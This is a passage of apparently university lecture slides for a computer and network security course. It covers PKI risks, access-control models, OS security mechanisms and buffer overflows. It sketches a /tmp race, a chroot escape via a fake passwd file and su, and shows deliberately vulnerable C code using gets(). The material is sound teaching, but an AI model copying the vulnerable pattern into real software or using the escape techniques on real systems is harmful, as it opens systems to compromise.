• 8 : How was the user authenticated?
‣ Argument: CAs do not have good information to work

with, so real identification is poor (as VISA)
‣ Counter-Argument: It has worked well in the physical

work, why not here?

• 9 : How secure are the certificate practices?
‣ Argument: people don’t use them correctly, and don’t

know the implications of what they do use
• Point in fact: revocation and expiration are largely ignored in

real system deployments

‣ Counter-Argument: most are pretty good now, probably

won’t burn us anytime soon
CIS 433/533: Computer and Network Security

47

Risk 9 - How secure cert. practices?
• Argument: certificates have to be used properly to

be secure
‣ Everything is based on the legitimacy of the verifier root

public key, protection of its key
‣ Lifetime & revocation have to be done

• Counter-Argument: this is the price of technology
‣ You have to accept some risk in order to get benefit
‣ Will encourage people to use only safe technology

• Q: What’s in your browser?
CIS 433/533: Computer and Network Security

48

Risk 10 - Why are we using PKI?
• Argument: We are trying to solve a painful

problem: authenticating users.
‣ However, certificates don’t really solve the problem, just

give you another tool to implement it
‣ Hence, it is not a panacea
‣ Not delivered on its promises

• Counter-argument?
CIS 433/533: Computer and Network Security

49

CIS433/533 - Introduction to
Computer and Network Security
Access Control
Professor Butler
Winter 2011
Computer and Information Science

Trusted Computing Base
• The trusted computing base is the

infrastructure that you assume will
behave correctly
‣ Hardware (keyboard, monitor, …)
‣ Operating Systems
‣ Implementations
‣ Local networks
‣ Administrators
‣ Other users on the same system

• Axiom: the larger the TCB, the more

assumptions you must make (and hence,
the more opportunity to have your
assumptions violated).
CIS 433/533: Computer and Network Security

2

Policy
• First, what is a policy?
‣ Some statement of secure procedure or configuration

that parameterizes the operation of a system
‣ Example: Airport Policy
‣ Take off your shoes
‣ No bottles that could contain > 3 ozs
‣ Empty bottles are OK?
‣ You need to put your things through X-ray machine
‣ Laptops by themselves, coat off
‣ Metal detector

• Purpose: prevent on-airplane (metal) weapon …
CIS 433/533: Computer and Network Security

3

… when policy goes wrong
• Driving license test: take until you pass
‣ Mrs. Miriam Hargrave of Yorkshire, UK failed her driving
test 39 times between 1962 and 1970!!!!
‣ … she had 212 driving lessons ….
‣ She finally got it on the 40th try.
‣ Some years later, she was quoted as saying, “sometimes I

still have trouble turning right”

“A policy is a set of
acceptable behaviors.”
- F. Schneider
CIS 433/533: Computer and Network Security

4

Protection Domains
Protection domain
Memory

Program A

• The protection domain

restricts access of
external parties to our
computing system’s
resources
• How is this done

today?
Files

‣ Memory protection
‣ E.g., UNIX protected memory,

file-system permissions (rwx…)

CIS 433/533: Computer and Network Security

5

Access Policy Enforcement
• A protection state defines what each subject can do
‣ E.g., in an access matrix

• A reference monitor enforces the protection state
‣ A service that responds to the query...

• A correct reference monitor implementation meets

the following guarantees
‣ Tamperproof
‣ Complete Mediation
‣ Simple enough to verify

• A protection system consists of a protection state,

operations to modify that state, and a reference
monitor to enforce that state
CIS 433/533: Computer and Network Security

6

Access Control/Authorization
• An access control system determines what rights a

particular entity has for a set of objects
• It answers the question
‣ E.g., do you have the right to read /etc/passwd
‣ Does Alice have the right to view the CIS website?
‣ Do students have the right to share project data?
‣ Does Prof. Butler have the right to change your grades?

• An Access Control Policy answers these questions
CIS 433/533: Computer and Network Security

7

Simplified Access Control
• Subjects are the active entities that do things
‣ E.g., you, Alice, students, Prof. Butler

• Objects are passive things that things are done to
‣ E.g., /etc/passwd, CS website, project data, grades

• Rights are actions that are taken
‣ E.g., read, view, share, change

CIS 433/533: Computer and Network Security

8

Policy Goals
• Secrecy
‣ Don’t allow reading by unauthorized subjects
‣ Control where data can be written by authorized subjects
• Why is this important?

• Integrity
‣ Don’t permit dependence on lower integrity data/code
• Why is this important?
‣ What is “dependence”?

• Availability
‣ The necessary function must run
‣ Doesn’t this conflict with above?

CIS 433/533: Computer and Network Security

9

The Access Matrix
• An access matrix is one way to

represent policy.
‣ Frequently used mechanism for

describing policy

• Columns are objects, subjects

are rows.
• To determine if Si has right to

access object Oj, find the
appropriate entry.
• Succinct descriptor for

O(|S|*|O|) entries

O1 O2 O3
S1 Y

Y N

S2 N Y N
S3 N Y

Y

• There is a matrix for each right.

CIS 433/533: Computer and Network Security

10

Access Control
• Suppose the private key

file for J is object O1
‣ Only J can read

• Suppose the public key

file for J is object O2
‣ All can read, only J can

O1

O2

O3

J

?

?

?

S2

?

?

?

S3

?

?

?

modify

• Suppose all can read and

write from object O3
• What’s the access matrix?
CIS 433/533: Computer and Network Security

11

Trusted Processes
• Does it matter if we do not trust some of J’s

processes?

CIS 433/533: Computer and Network Security

O1

O2

O3

J

R

RW RW

S2

N

R

RW

S3

N

R

RW

12

Secrecy
• Does the following protection state ensure the

secrecy of J’s private key in O1?

CIS 433/533: Computer and Network Security

O1

O2

O3

J

R

RW RW

S2

N

R

RW

S3

N

R

RW

13

Integrity
• Does the following access matrix protect the

integrity of J’s public key file O2?

CIS 433/533: Computer and Network Security

O1

O2

O3

J

R

RW RW

S2

N

R

RW

S3

N

R

RW

14

Protection vs Security
• Protection
‣ Security goals met under trusted processes
‣ Protects against an error by a non-malicious entity

• Security
‣ Security goals met under potentially malicious processes
‣ Protects against any malicious entity
‣ Hence, For J:
• Non-malicious process shouldn’t leak the private key by writing it

to O3
• A potentially malicious process may contain a Trojan horse that

can write the private key to O3
CIS 433/533: Computer and Network Security

15

Least Privilege
• Limit permissions to those required and no more
• Consider three processes for user J
‣ Restrict privilege of the process J1 to prevent leaks

CIS 433/533: Computer and Network Security

O1

O2

O3

J1

R

R

N

J2

N

RW

N

J3

N

R

RW

16

Access Control Administration
There are two central ways to specify a policy
1. Discretionary - object “owners” define policy
‣ Users have discretion over who has access to what

objects and when (trusted users)
‣ Canonical example, the UNIX filesystem
– RWX assigned by file owners

2. Mandatory - Environment enforces static policy
‣ Access control policy defined by environment, user has

no control over access policy (untrusted users)
‣ Canonical example, process labeling
• System assigns labels for processes, objects, and a

dominance calculus is used to evaluate rights
CIS 433/533: Computer and Network Security

17

DAC vs. MAC
• Discretionary Access Control
‣ User defines the access policy
‣ Can pass rights onto other subjects (called

delegation)
‣ Their programs can pass their rights
• Consider a Trojan horse

• Mandatory Access Control
‣ System defines access policy
‣ Subjects cannot pass rights
‣ Subjects’ programs cannot pass rights
• Consider a Trojan horse here
CIS 433/533: Computer and Network Security

18

Administrative Operations
• An access matrix defines a protection state
• A protection system also includes a set of

operations for modifying that state
• Examples
‣ Add right (UNIX): If the user is the owner of the object,

then the user can add an operation to set of operations of
another user
‣ Add right: If domain has the copy flag set for that right in

its access matrix row, then it can add that right to any
other domain’s access row
CIS 433/533: Computer and Network Security

19

DAC vs. MAC in Access Matrix
• Subjects:


DAC: users



MAC: labels

O1 O2 O3

• Objects:


DAC: files, sockets, etc.



MAC: labels

• Operations:


Same

• Administration:


DAC: owner, copy flag, ...



MAC: external

S1 Y

Y N

S2 N Y N
S3 N Y

Y

• MAC: largely static matrix; DAC: all can change
CIS 433/533: Computer and Network Security

20

Conflicting Goals
• Challenges of building a secure system
‣ What are the users’ goals?
‣ What do application developers want?
‣ What about the data owners (corporations/

governments)?
‣ What is the purpose of system administrators?
‣ What about the requirements of operating system

designers?

• Need a satisfying balance among these goals?

CIS 433/533: Computer and Network Security

21

Principle of Least Privilege
A system should only provide those rights
needed to perform the processes function
and no more.
• Implication 1: you want to reduce the

protection domain to the smallest possible set
of objects
• Implication 2: you want to assign the minimal

set of rights to each subject
• Caveat: of course, you need to provide

enough rights and a large enough protection
domain to get the job done.
CIS 433/533: Computer and Network Security

22

Access Control Models
• What language should I use to express policy?
‣ Access Control Model

• Oodles of these
‣ Some specialize in secrecy
• Bell-LaPadula

‣ Some specialize in integrity
• Clark-Wilson

‣ Some focus on jobs
• RBAC

‣ Some specialize in least privilege
• SELinux Type Enforcement

• Q: Why are there so many different models?
CIS 433/533: Computer and Network Security

23

Groups
• Groups are collections of identities who are

assigned rights as a collective
• Important in that it allows permissions to be
assigned in aggregates of users …
Group
Users

Alice

Bob Ivan

Permissions

Trent

• This is really about “membership”
‣ Standard DAC
‣ Permissions are transient
CIS 433/533: Computer and Network Security

24

Job Functions
• In an enterprise, we don’t really do anything as

ourselves, we do things as some job function
‣ E.g., student, professor, doctor

• One could manage this as groups, right?
‣ We are assigned to groups all the time, and given similar

rights as them, i.e., mailing lists
CIS 433/533: Computer and Network Security

25

Roles
• A role is a collection of privileges/permissions

associated with some function or affiliation
• NIST studied the way permissions are assigned

and used in the real world, and this is it …
Role
Users

Read

Delete

Write

Permissions

Modify

• Important: the permissions are static, the user-role

membership is transient
• This is not standard DAC
CIS 433/533: Computer and Network Security

26

Role Based Access Control
• Role based access control is a class of access

control not directly MAC and DAC, but may be one or
either of these.
• A lot of literature deals with RBAC models
• Most formulations are of the type
‣ U: users -- these are the subjects in the system
‣ R: roles -- these are the different roles users may assume
‣ P: permissions --- these are the rights which can be assumed

• There is a many-to-many relation between:
‣ Users and roles
‣ Roles and permissions

• Relations define the role-based access control policy
CIS 433/533: Computer and Network Security

27

RBAC Sessions
• During a session, a user assumes a subset of

available roles
‣ Known as activating a set of roles
‣ The user rights are the union of the rights of the activated

roles
‣ Note: the session terminates at the user’s discretion

• Q: Why not just activate all the roles?
CIS 433/533: Computer and Network Security

28

Multilevel Security
• A multi-level security system tags all object and

subject with security tags classifying them in terms
of sensitivity/access level.
‣ We formulate an access control policy based on these

levels
‣ We can also add other dimensions, called categories

which horizontally partition the rights space (in a way
similar to that as was done by roles)

security levels
categories
CIS 433/533: Computer and Network Security

29

Lattice Model
• Used by the US military (and many others), the

Lattice model uses MLS to define policy
• Levels:
UNCLASSIFIED < CONFIDENTIAL < SECRET < TOP SECRET

• Categories (actually unbounded set)
NUC(lear), INTEL(ligence), CRYPTO(graphy)

• Note that these levels are used for physical

documents in the governments as well.
CIS 433/533: Computer and Network Security

30

Assigning Security Levels
• All subjects are assigned clearance levels and

compartments
‣ Alice: (SECRET, {CRYTPO, NUC})
‣ Bob: (CONFIDENTIAL, {INTEL})
‣ Charlie: (TOP SECRET, {CRYPTO, NUC, INTEL})

• All objects are assigned an access class
‣ DocA: (CONFIDENTIAL, {INTEL})
‣ DocB: (SECRET, {CRYPTO})
‣ DocC: (UNCLASSIFIED, {NUC})
CIS 433/533: Computer and Network Security

31

Evaluating Policy
• Access is allowed if

subject clearance level >= object sensitivity level and
subject categories ⊇ object categories (read down)
Charlie: TS, {CRYPTO, NUC, INTEL})
Bob: CONF., {INTEL})

Alice: (SEC., {CRYTPO, NUC})

DocB: (SECRET, {CRYPTO})
DocA: (CONFIDENTIAL, {INTEL})
DocC: (UNCLASSIFIED, {NUC})

• Q: What would write-up be?

CIS 433/533: Computer and Network Security

32

How about integrity?
• MLS as presented before talks about who can “read” a

document (confidentiality)
• Integrity is considered who can “write” to a document
‣ Thus, who can affect the integrity (content) of a document
‣ Example: You may not care who can read DNS records, but you

better care who writes to them!

• Biba defined a dual of secrecy for integrity
‣ Lattice policy with, “no read down, no write up”
• Users can only create content at or below their own integrity level (a
monk may write a prayer book that can be read by commoners, but not
one to be read by a high priest).
• Users can only view content at or above their own integrity level (a
monk may read a book written by the high priest, but may not read a
pamphlet written by a lowly commoner).


The lattice model for secrecy matched the paper world, does this integrity model?


Consider an Oracle

CIS 433/533: Computer and Network Security

33

Biba (example)
• Which users can modify what documents?
‣ Remember “no read down, no write up”

Charlie: TS, {CRYPTO, NUC, INTEL})
Bob: CONF., {INTEL})

Alice: (SEC., {CRYTPO, NUC})

?????
DocB: (SECRET, {CRYPTO})
DocA: (CONFIDENTIAL, {INTEL})
DocC: (UNCLASSIFIED, {NUC})

CIS 433/533: Computer and Network Security

34

LOMAC
• Low-Water Mark integrity
‣ Change integrity level based on actual dependencies

• Subject is initially at the highest integrity
‣ But integrity level can change based on objects accessed

• Ultimately, subject has integrity of lowest object read
CIS 433/533: Computer and Network Security

35

Clark-Wilson Integrity
• Map Integrity in Business (e.g., accounting) to Computing
• High Integrity Data (objects)


“Constrained Data Items” (CDIs)

• High Integrity Processes (programs)


“Transformation Procedures” (TPs)

• Check Integrity of Data Initially (verification)


“Integrity Verification Procedures” (IVPs)

• Premise


If the IVPs verify initial integrity



and high integrity data is only modified by TPs



Then, the integrity of computation is preserved

CIS 433/533: Computer and Network Security

36

Clark Wilson Permissions
User

User

User

User

CDI

CDI

CDI

CDI

CIS 433/533: Computer and Network Security

37

CW Permissions (cont.)
User

User

TP

CDI

CIS 433/533: Computer and Network Security

User

TP

CDI

User

TP

CDI

CDI

38

CW Permissions (cont.)
• A user can access an CDI using TP iff
1. The user has been granted CDI access
2. The TP has been granted CDI access
3. The user has been granted access to the TP
User

User

User

User

User

User

TP

CDI

CDI

CDI

CDI

CIS 433/533: Computer and Network Security

CDI

User

TP

CDI

User

TP

CDI

CDI

39

Clark-Wilson Issues
• Assure Function
‣ Certify IVPs, TPs to be

‘valid’ (i.e., correct) (C1,C2)
‣ Is there a general way of

defining correctness?

• Handle Low Integrity Data
‣ A TP must upgrade or

discard any UDI (low integrity
data) it receives (C5)

Reality: this is a nice model, but too heavyweight in
general for most applications. CW-lite (Jaeger) is an
alternative that is tractable to implement.
CIS 433/533: Computer and Network Security

40

Safety Problem
• For a protection system
‣ (ref mon, protection state, and administrative operations)

• Prove that any future state will not result in the

leakage of an access right to an unauthorized user
‣ Q: Why is this important?

• For most discretionary access control models,
‣ Safety is undecidable

• Means that we need another way to prove safety
‣ Restrict the model (no one uses)
‣ Test incrementally (constraints)

• How does the safety problem affect MAC models?
CIS 433/533: Computer and Network Security

41

Constraints
• In reality, you want to constrain the choices of

protection states
‣ Constraints are explicit ways of doing just this
‣ Constraints available (in RBAC)
• role assumption
• perm-role assignment
• user-role assignment

• Examples in RBAC:
‣ Required inclusion: You must be acting as an employee of

the University of Oregon to be a professor
• You must assume a (parent) role to assume another (child) role

‣ Mutual exclusion: can not be both CFO and auditor for the

same company (unless you work for Enron)
‣ Cardinality constraint: only one (or n) of a particular role
CIS 433/533: Computer and Network Security

42

Constraint Example
• Mutual Exclusion: No

entity can activate student
and faculty roles at the
same time?
‣ Give yourself credits, etc.
‣ Or, in this case buy faculty

tickets at student prices?

CIS 433/533: Computer and Network Security

43

TPM
• The Trusted Platform

Module is a tamper
resistant secure
microcontroller.
‣ Manages cryptographic keys

and functionality it uses to
support security relevant
operations.
‣ Measures the code loaded by
the system (firmware, BIOS,
OS kernel, device drives,
application processes, ...)
• Measurements are hashes of

loaded code (PCRs)
CIS 433/533: Computer and Network Security

44

Integrity Measurement
• Means used to determine the

state of the host
• Relies on measurement (i.e., hash

fingerprinting of the code)

drivers

OS kernel

H(...)

H(...)

‣ Hardware support emanates from

the core root of trust for
measurement (CRTM), secured on
the host
‣ subsequent measured steps:

BIOS, bootloader (stage 1 & 2),
VMM, OS running on VMM

VMM
H(...)

stage 2
bootloader

stage 1 bootloader (MBR)

BIOS

• Attestation of the code to support

authenticated boot is performed
with TPM Quote operation
CIS 433/533: Computer and Network Security

H(...)

H(...)

H(...)

CRTM

45

CIS433/533 - Computer and
Network Security
Operating System Security

Professor Kevin Butler
Winter 2010
Computer and Information Science

OS Security
• An secure OS should provide (at least) the following

mechanisms
‣ Memory protection
‣ File protection
‣ General object protection
‣ Access authentication

• How do we go about designing a trusted OS?
• “Trust” in this context means something different from

“Secure”

CIS 433/533: Computer and Network Security

2

Trust vs. Security
• When you get your medication at a pharmacy, you

are “trusting” that it is appropriate for the condition
you are addressing. In effect, you are arguing
internally:
‣ The doctor was correct in prescribing this drug
‣ The FDA vetted the drug through scientific analysis and

clinical trials
‣ No maniac has tampered with the bottle

• The first two are are matters “trust”, and the last is

a matter of “security”
• An OS needs to perform similar due diligence to

achieve “trust” and “security”
CIS 433/533: Computer and Network Security

3

Access Control Lists
• ACL: a list of the principals that are authorized to

have access to some object.
• Eg.,
O2
•! Or more correctly:

S1 Y
S2 Y

! !O1: S1
! !O2: S1, S2, S3
! !O3: S3

S3 Y
CIS 433/533: Computer and Network Security

4

ACL in systems
• ACLs are typically used to implement discretionary

access control
• For example: you define the UNIX file system ACLs

using the chmod utility ….

CIS 433/533: Computer and Network Security

5

Discretionary Access Control in UNIX FS
• The UNIX filesystem implements discretionary

access control through file permissions set by user
• The set of objects is the files in the filesystem,
‣ e.g., /etc/passwd

• Each file an owner and group (subjects)
‣ The owner is typically the creator of the file, and the entity

in control of the access control policy
‣ Note: this can be overridden by the “root” user

• There is a additional subject called world, which

represents everyone else
CIS 433/533: Computer and Network Security

6

UNIX filesystem rights …
• There are three rights in the UNIX filesystem
‣ READ - allows the subject (process) to read the

contents of the file.
‣ WRITE - allows the subject (process) to alter the

contents of the file.
‣ EXECUTE - allows the subject (process) to execute the

contents of the file (e.g., shell program, executable, …)

• Q: why is execute a right?
• Q: does the right to read a program implicitly give

you the right to execute it?
CIS 433/533: Computer and Network Security

7

The UNIX FS access policy
• Really, this is a bit string encoding an access matrix
• E.g.,

rwx rwx rwx
World
Group
Owner

• And a policy is encoded as “r”, “w”, “x” if enabled,

and “-” if not, e.g,
rwxrw--x
• Says user can read, write and execute, group can

read and write, and world can execute only.
CIS 433/533: Computer and Network Security

8

Caveats: UNIX Filesystem
• Access is often not really this easy: you need to

have certain rights to parent directories to access a
file (execute, for example)
‣ The reasons for this are quite esoteric

• The preceding policy may appear to be

contradictory
‣ A member of the group does not have execute rights, but

members of the world do, so …
‣ A user appears to be both allowed and prohibited from
executing access
‣ Not really: these policies are monotonic … the absence
of a right does not mean they should not get access at
all, just that that particular identity (e.g., group member,
world) should not be given that right.
CIS 433/533: Computer and Network Security

9

Windows grows up ...
• Windows 2000 marked the beginning of real OS

security for the Windows systems ...

CIS 433/533: Computer and Network Security

10

Tokens
• Like the UID/GID in a UNIX process
‣ User
‣ Group
‣ Aliases
‣ Privileges (predefined sets of rights)

• May be specific to a domain
• Composed into global SID
• Subsequent processes inherit access tokens
‣ Different processes may have different rights
CIS 433/533: Computer and Network Security

11

Access Control Entries
• DACL in the security descriptor of an object
‣ e.g., like “rwx”
‣ List of access control entries (ACEs)

ACE structure (proposed by Swift et al)
1. Type (grant or deny)
2. Flags
3. Object Type: global UID for type (limit ACEs
checked)
4. InheritedObjectType: complex inheritance
5. Access rights: access mask
6. Principal SID: principal the ACE applies to
CIS 433/533: Computer and Network Security

12

ACE Authorization
• The ACEs for a particular request are totally

ordered.
• Start form the top and check each:
• Checking algorithm
‣ Authorizing for SIDs in token on set of rights
1. if ACE matches SID (user, group, alias, etc)

a. ACE denies access for specified right -- deny
b. ACE grants access for some rights -- need full coverage

2. If reach the bottom and not all granted, request denied

CIS 433/533: Computer and Network Security

13

Access Checking with ACEs
• Example

CIS 433/533: Computer and Network Security

14

Windows Vista Integrity
• Integrity protection for writing
• Defines a series of protection level of increasing protection
‣ untrusted (lowest)
‣ low (Internet)
‣ medium (user)
‣ high (admin)
‣ system
‣ installer (highest)

• Semantics: If subject’s (process’s) integrity level dominates the

object’s integrity level, then the write is allowed

CIS 433/533: Computer and Network Security

15

Vista Integrity
S1(installer)

O1(admin)

S2(user)

02(untrusted)

S3(untrusted)

03(user)

CIS 433/533: Computer and Network Security

16

Vista Integrity
S1(installer)

O1(admin)

S2(user)

02(untrusted)

S3(untrusted)

03(user)

CIS 433/533: Computer and Network Security

17

UID Transition: Setuid
• A special bit in the mode bits
• Execute file
‣ Resulting process has the effective (and fs) UID/GID of file

owner

• Enables a user to escalate privilege
‣ For executing a trusted service

• Downside: User defines execution environment
‣ e.g., Environment variables, input arguments, open descriptors,

etc.

• Service must protect itself or user can gain root access
• All UNIX services involves root processes --

many via setuid
CIS 433/533: Computer and Network Security

18

And now back to UNIX ...

CIS 433/533: Computer and Network Security

19

UID Transition: Setuid
• A special bit in the mode bits
• Execute file
‣ Resulting process has the effective (and fs) UID/GID of file

owner

• Enables a user to escalate privilege
‣ For executing a trusted service

• Downside: User defines execution environment
‣ e.g., Environment variables, input arguments, open

descriptors, etc.

• Service must protect itself or user can gain root

access
• All UNIX services involves root processes -- many via
setuid
CIS 433/533: Computer and Network Security

20

/tmp Vulnerability
• creat(pathname, mode)
• O_EXCL flag
‣ if file already exists this is an error

• Potential attack
‣ Attacker creates file in shared space (/tmp)
‣ Give it a filename used by a higher authority service
‣ Make sure that service has permission to the file
‣ If creat is used without O_EXCL, then can share the file

with the higher authority process
CIS 433/533: Computer and Network Security

21

Other Vulnerabilities
• Objects w/o sufficient control
‣ Windows registry, network

• Libraries
‣ Load order permits malware defined libraries

• Executables are everywhere
‣ Web content, Email, Documents (Word)

• Labeling is wrong
‣ Mount a new file system; device

• Malware can modify your permissions
‣ Inherent to discretionary model
CIS 433/533: Computer and Network Security

22

Sandboxing
• An execution environment for programs that contains a limited set of

rights


A subset of your permissions (meet secrecy and integrity goals)



Cannot be changed by the running program (mandatory)

CIS 433/533: Computer and Network Security

23

UNIX Chroot
• Create a domain in which a process is confined
‣ Process can only read/write within file system subtree
‣ Applies to all descendant processes
‣ Can carry file descriptors in ‘chroot jail’

CIS 433/533: Computer and Network Security

24

Chroot Vulnerability
• Unfortunately, chroot can trick its own system
‣ define a passwd file at <newroot>/etc/passwd
‣ run su
• su thinks that this is the real passwd file
‣ gives root access
• Use mknod to create device file to access physical memory

• Setup requires great care
‣ Never run chroot process as root
‣ Must not be able to get root privileges
‣ No control by chrooted process (user) of contents in jail
‣ Be careful about descriptors, open sockets, IPC that may

be available
CIS 433/533: Computer and Network Security

25

Process-specific Permissions
• Design the permissions of a process specific to its

use

• How do we change the permissions of a process

in an ACL system?
CIS 433/533: Computer and Network Security

26

Confused Deputy Problem
• Imagine a multi-client server
‣ Clients have a different set of objects that

they can access

• In an ACL system, the server always has

access to all the objects
‣ What happens if a client tricks the server

into accessing into another client’s objects?
‣ Shouldn’t the server only have access to that

client’s objects for its requests?

CIS 433/533: Computer and Network Security

27

Capabilities
• A capability is the tuple (object, rights)
• A capability system implements access control by

checking if the process has an appropriate
capability
‣ Simple, right?
‣ This is a little like a ticket in the Kerberos system

• Q: Does this eliminate the need for authentication?
CIS 433/533: Computer and Network Security

28

Capabilities
• A: Well, yes and no …
• Capabilities remove the overhead of managing per

object rights, but add the overhead of managing
capabilities
• Moreover, to get any real security, they have to be

unforgeable
‣ Hardware tags (to protect capabilities)
‣ Protected address space/registers
‣ Language based techniques
• Enforce access restrictions on caps.

‣ Cryptography
• Make them unforgeable
CIS 433/533: Computer and Network Security

29

Real OS Capabilities
Process Table

C List
RX
RW

Process Z

.
.
.

XC
RD
WE
.
.
.

A
B
C
D



The OS kernel manages capabilities in the process table, out of
reach of the process



Capabilities added by user requests (that comply with policy)

CIS 433/533: Computer and Network Security

30

User space capability?
• Well, what are the requirements?
‣ Authenticity/integrity - do not want malicious process to

forge capabilities

• Start with the data itself: [object, rights]
‣ Object is typically encoded with identifier, or by some

other tag (capabilities are sometimes known as tags)
‣ Rights are often fixed (read, modify, write, execute, etc.)

• Now, do what you with any other data (assume the

kernel has a secret key k)
E(k, [Oi, r1, r2, … rn])
• What’s wrong with this construction (I got it from the website of one of the

experts in the area)?
CIS 433/533: Computer and Network Security

31

The right construction
• Encryption does not provide authenticity/integrity, it

provides confidentiality
[Oi, r1, r2, … rn],HMAC(k, [Oi, r1, r2, … rn])
• So how would you attack the preceding

construction?

CIS 433/533: Computer and Network Security

32

A (fictional) Capability Example


We use the “ls -lt” command to view the contents of our home directory in
a OS implementing capabilities:


Initially, our shell process has RWX capabilities for our home directory, and RX
capabilities for all the directories to the root.



The “ls -lt” command is exec()ed, and the shell delegates the directory permissions
by giving “ls” the capabilities




Note that the capabilities are _not_ tied to any subject



The “ls -lt” process exercises the rights to read the directories structure all the way
down to the local



Of course, the “ls -lt” process now need to obtain read rights to the files (to get
their specific meta-information), and obtains them by appealing to the security
manager (in kernel) -- the request fulfills the policy, and they are added and
exercised



The “ls -lt” uses access rights given to the terminal to write output

Note: there are many ways that the policy can be implemented, rights
handed off, etc. We will talk about a couple in the following discussions.

CIS 433/533: Computer and Network Security

33

MAC Systems
• Major Effort: Multics
‣ Multiprocessing system -- developed many OS concepts
• Including security

‣ Begun in 1965
• Development continued into the mid-70s

‣ Used until 2000
‣ Initial partners: MIT, Bell Labs, GE/Honeywell
‣ Other innovations: hierarchical filesystems, dynamic linking

• Subsequent proprietary system, SCOMP, became the

basis for secure operating systems design
CIS 433/533: Computer and Network Security

34

Multics Goals
• Secrecy
‣ Multilevel security

• Integrity
‣ Rings of protection

• Reference Monitoring
‣ Mediate segment access, ring

crossing

• Resulting system is considered

a high point in secure system
design
CIS 433/533: Computer and Network Security

35

Multics Basics
• Processes are programs that are executing within

Multics (seems obvious now ...)
‣ Protection domain is a list of segments
‣ Stored in the process descriptor segment

• Segments are stored value regions that are accessible

by processes, e.g., memory regions, secondary storage
‣ Segments can be organized into hierarchies
‣ Local segments (memory addresses) are accessed directly
‣ Non-local segments are addressed by hierarchy
• /tape/drive1/top10k
• /etc/conf/http.conf
• This is the genesis of the modern hierarchical filesystem!
CIS 433/533: Computer and Network Security

36

Segment Management
• PDS acts like segment working

set for process

Process Descriptor Segment
Segment 0

‣ Segments are addressed by

name (path)

Segment Descr. Word 0

Segment 1

Segment Descr. Word 1

‣ If authorized, added to PDS
‣ Multics security is defined with

....

respect to segments
Segment N

Segment Descr. Word N

• The supervisor (kernel) makes

decisions and adds to PDS
‣ supervisor is isolated by

protection rings
CIS 433/533: Computer and Network Security

37

Protection Rings
• Successively less-privileged “domains”
• Modern CPUs support 4 rings
‣ Use 2 mainly: Kernel and user

• Intel x86 rings
‣ Ring 0 has kernel
‣ Ring 3 has application code

• Example: Multics (64 rings in theory,

8 in practice)
CIS 433/533: Computer and Network Security

38

What Are Protection Rings?
• Coarse-grained, Hardware Protection

Mechanism
• Boundary between Levels of Authority
‣ Most privileged -- ring 0
‣ Monotonically less privileged above

• Fundamental Purpose
‣ Protect system integrity
• Protect kernel from services
• Protect services from applications
• So on...
CIS 433/533: Computer and Network Security

39

Intel Protection Ring Rules
• Each Memory Segment has a privilege level (ring

number)
• The CPU has a Current Protection Level (CPL)
‣ Level of the segment where instructions are being read

• Program can read/write in segments of higher level

than CPL
‣ kernel can read/write user space
‣ user cannot read/write kernel
• why not?

CIS 433/533: Computer and Network Security

40

Protection Ring Rules
• Program cannot call

Ring 3

code of higher
privilege directly
‣ Gate is a special

memory address where
lower-privilege code can
call higher

Gate

No
gate

Ring 0

• Enables OS to control

where applications call it
(system calls)

CIS 433/533: Computer and Network Security

41

Multics Interpretation
• Kernel resides in ring 0
• Process runs in a ring r
‣ Access based on current ring
• Process accesses data (segment)
‣ Each data segment has an access
bracket: (a1, a2)


segment



r is the current ring
r <= a1: access permitted
a1 < r <= a2: r and x permitted; w
denied
a2 < r: all access denied

CIS 433/533: Computer and Network Security

---

6
5
a2
4

a1 <= a2

‣ Describes read and write access to




7

Ring

R-X

3
2
1

a1

RWX

0

42

Multics Interpretation (con’t)


Also different procedure segments


with call brackets: (c1, c2), c1 <= c2



and access brackets (a1, a2)



The following must be true (a2 == c1)



Rights to execute code in a new procedure segment


r < a1: access permitted with ring-crossing fault



a1 <= r <= a2 = c1: access permitted and no fault



a2 < r <= c2: access permitted through a valid gate





c2
6
5
a2
4
Ring

3

What’s it mean?

2



1

case 1: ring-crossing fault changes procedure’s ring




c2 < r: access denied

increases from r to a1



case 2: keep same ring number



case 3: gate checks args, decreases ring number

Denied

7

0

Allow
with
gate

c1
No ring
fault

a1
Ring
fault

Target code segment defines the new ring

CIS 433/533: Computer and Network Security

43

Multics Vulnerability Analysis
• Detailed security analysis covering


Hardware



Software



Procedural features (administration)

• Good news


Design for security



System language prevents buffer overflows






Defined buffer sizes

Hardware features prevent buffer overflows


Addressing off segment is an error



Stack grows up

System is much smaller than current UNIX systems

• Vulnerability analysis found flaws that were fixed


Multics attained a B2 evaluation (MAC system)

CIS 433/533: Computer and Network Security

44

Vulnerabilities Found
• Hardware


Indirect addressing -- incomplete mediation




Check direct, but not indirect address

Mistaken modification introduced the error

• Software




Ring protection (done in software)


Argument validation was flawed



Certain type of pointer was handled incorrectly

Master mode transfer


For performance, run master mode program (signaler) in user ring



Development assumed trusted input to signaler -- bad combo

• Procedural


Trap door insertion goes undetected

CIS 433/533: Computer and Network Security

45

Question
• If Multics was so good why was it so insecure?
• If Multics was so good, why didn’t anybody use it?

CIS 433/533: Computer and Network Security

46

CIS433/533 - Computer
and Network Security
Software Security

Professor Kevin Butler
Winter 2010
Computer and Information Science

Buffer Overflow
• Very common attack mechanism
‣ from 1988 Morris Worm to Code Red, Slammer, Sasser

and many others
• prevention techniques known
• still of major concern due to
‣ legacy of widely deployed buggy
‣ continued careless programming techniques

CIS 433/533: Computer and Network Security

Buffer Overflow Basics
• caused by programming error
• allows more data to be stored than capacity

available in a fixed sized buffer
‣ buffer can be on stack, heap, global data

• overwriting adjacent memory locations
‣ corruption of program data
‣ unexpected transfer of control
‣ memory access violation
‣ execution of code chosen by attacker

CIS 433/533: Computer and Network Security

Buffer Overflow Example
int main(int argc, char *argv[]) {
int valid = FALSE;
char str1[8];
char str2[8];

}

next_tag(str1);
gets(str2);
if (strncmp(str1, str2, 8) == 0)
valid = TRUE;
printf("buffer1: str1(%s), str2(%s),
valid(%d)\n", str1, str2, valid);

$ cc -g -o buffer1 buffer1.c
$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE),
str2(EVILINPUTVALUE), valid(0)
$ ./buffer1
BADINPUTBADINPUT
buffer1: str1(BADINPUT),
str2(BADINPUTBADINPUT), valid(1)

CIS 433/533: Computer and Network Security

Example
int main(int argc, char *argv[]) {
int valid = FALSE;
char str1[8];
char str2[8];

}

next_tag(str1);
gets(str2);
if (strncmp(str1, str2, 8) == 0)
valid = TRUE;
printf("buffer1: str1(%s), str2(%s),
valid(%d)\n", str1, str2, valid);

